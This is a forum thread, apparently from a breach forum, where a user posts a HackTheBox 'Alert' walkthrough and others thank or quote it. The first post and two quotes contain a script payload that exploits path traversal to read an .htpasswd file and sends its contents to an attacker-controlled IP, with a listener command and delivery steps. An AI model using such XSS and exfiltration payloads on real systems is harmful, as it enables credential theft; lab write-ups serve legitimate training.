HTB alert (user)
by SSKK - Thursday November 28, 2024 at 05:44 AM
Breached
Member
Posts: 16
Threads: 1
Joined: Sep 2023
Reputation: 0

#1
11-28-2024, 05:44 AM (This post was last modified: 11-28-2024, 05:51 AM by SSKK.)
upload this md file to the alert.htb

<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.xx.xx:80/?file_content=" + encodeURIComponent(data));
  });
</script>

On localhost  -->
python3 -m http.server 80

after clicking on View Markdown click on Share Markdown

then copy the link of that shared markdown url and paste it in the Contact Us page and send it.

you'll get something like this [Image: Screenshot.png]


doneeeee
Reply
Breached
Member
Posts: 30
Threads: 0
Joined: Feb 2024
Reputation: 0

#2
12-04-2024, 12:52 AM
thanks for the post explaining this! was stuck here for a bit.
Reply
Breached
Member
Posts: 4
Threads: 0
Joined: Jun 2024
Reputation: 0

#3
01-03-2025, 08:41 PM (This post was last modified: 01-03-2025, 08:43 PM by mrtyry3132123.)
(11-28-2024, 05:44 AM)SSKK Wrote: upload this md file to the alert.htb

<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.xx.xx:80/?file_content=" + encodeURIComponent(data));
  });
</script>

Hi! How did you discover LFI vulnerability in 'http://alert.htb/messages.php?file='?
Reply
Banned

Posts: 28
Threads: 0
Joined: Jun 2024
Reputation: 0

#4
01-31-2025, 10:16 AM
(11-28-2024, 05:44 AM)SSKK Wrote: upload this md file to the alert.htb

<script>
fetch("http://alert.htb/messages.php?file=../../../../../../../var/www/statistics.alert.htb/.htpasswd")
  .then(response => response.text())
  .then(data => {
    fetch("http://10.10.xx.xx:80/?file_content=" + encodeURIComponent(data));
  });
</script>

On localhost  -->
python3 -m http.server 80

after clicking on View Markdown click on Share Markdown

then copy the link of that shared markdown url and paste it in the Contact Us page and send it.

you'll get something like this [Image: Screenshot.png]


doneeeee

Thanks man, much appreciated
This forum account is currently banned. Ban Length: (Permanent)
Ban Reason: Leeching | http://breachddyfwvcp4kzccos5oxtdbssmfbp...an-Appeals if you feel this is incorrect.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot htb-bot 91 7,557 Today, 07:45 AM
Last Post: ukaugse
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 364 88,802 Yesterday, 07:41 PM
Last Post: napo22
  [FREE] HTB-ProLabs APTLABS Just Flags kewlsunny 23 2,357 03-28-2026, 03:30 AM
Last Post: lulaladrow
  HTB Eloquia User and Root Flags - Insane Box 69646B 13 356 03-27-2026, 06:14 PM
Last Post: vlxw
  HTB - ALL Challenges you Stuck in osamy7593 2 652 03-27-2026, 04:24 PM
Last Post: catsweet



 Users browsing this thread: